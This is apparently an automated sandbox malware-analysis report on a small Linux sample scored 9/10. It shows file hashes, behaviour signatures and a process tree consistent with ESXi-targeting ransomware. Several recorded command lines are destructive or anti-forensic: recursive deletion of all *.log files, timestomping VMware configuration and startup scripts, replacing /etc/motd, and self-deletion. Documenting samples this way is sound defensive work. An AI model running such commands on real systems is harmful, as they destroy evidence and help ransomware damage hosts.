
Analysis

  • max time kernel
    0s
  • max time network
    123s
  • platform
    linux_mips
  • resource
    debian9-mipsbe-en-20211208
  • resource tags
    arch:mips
    image:debian9-mipsbe-en-20211208
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    05/02/2023, 07:05 UTC

General

  • Target

    e603944aceb5c0885a8627de12f36b159bbf2f05

  • Size

    3KB

  • MD5

    d0d36f169f1458806053aae482af5010

  • SHA1

    e603944aceb5c0885a8627de12f36b159bbf2f05

  • SHA256

    10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459

  • SHA512

    982abe39731d8cc852c25650740ff73975c10d19027eccf610401260e2f508334f1de656f8dd332fa698dccc9f7d3bda610c8b9e84d276036a6e9408d826229a

Score
9/10

Malware Config

Signatures

  • Writes file to system bin folder 1 TTPs 1 IoCs
  • Reads CPU attributes 1 TTPs 2 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
    /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
    1⤵
    • Writes file to tmp directory
    PID:325
    • /bin/chmod
      chmod +x /tmp//encrypt
      2⤵
      PID:339
    • /usr/bin/find
      find /usr/lib/vmware -type f -name index.html
      2⤵
      PID:344
    • /bin/mv
      mv /etc/motd /etc/motd1
      2⤵
      PID:345
    • /bin/cp
      cp /tmp//motd /etc/motd
      2⤵
      • Reads runtime system information
      PID:346
    • /bin/find
      /bin/find / -name "*.log" -exec /bin/rm -rf "{}" ";"
      2⤵
      PID:347
    • /bin/rm
      /bin/rm -f /store/packages/vmtools.py
      2⤵
      PID:357
    • /bin/touch
      /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/endpoints.conf
      2⤵
      PID:358
    • /bin/touch
      /bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh
      2⤵
      PID:359
    • /bin/touch
      /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/rc.local.d/local.sh
      2⤵
      PID:360
    • /bin/rm
      /bin/rm -f /tmp/encrypt /tmp/nohup.out /tmp/index.html /tmp/motd /tmp/public.pem /tmp/archieve.zip
      2⤵
      • Writes file to tmp directory
      PID:361
    • /bin/sh
      /bin/sh /bin/auto-backup.sh
      2⤵
      • Writes file to system bin folder
      PID:362
    • /bin/rm
      /bin/rm -- /tmp/e603944aceb5c0885a8627de12f36b159bbf2f05
      2⤵
      • Writes file to tmp directory
      PID:363
    • /etc/init.d/SSH
      /etc/init.d/SSH start
      2⤵
      PID:364
  • /bin/grep
    grep "Config File"
    1⤵
    PID:330
  • /usr/bin/awk
    awk "{print \$3}"
    1⤵
    PID:331
  • /bin/ps
    ps
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:333
  • /bin/grep
    grep vmx
    1⤵
    PID:334
  • /usr/bin/awk
    awk "{print \$2}"
    1⤵
    PID:335
  • /bin/grep
    grep /vmfs/volumes/
    1⤵
    PID:342
  • /usr/bin/awk
    awk "-F " "{print \$2}"
    1⤵
    PID:343
  • /bin/wc
    /bin/wc -l
    1⤵
    PID:352
  • /bin/grep
    /bin/grep encrypt
    1⤵
    PID:350
  • /bin/ps
    /bin/ps
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:349
  • /bin/grep
    /bin/grep -v grep
    1⤵
    PID:351
  • /bin/vmware
    /bin/vmware -l
    1⤵
    PID:354
  • /bin/grep
    /bin/grep " 7."
    1⤵
    PID:355
  • /bin/wc
    /bin/wc -l
    1⤵
    PID:356

Network

MITRE ATT&CK Enterprise v6
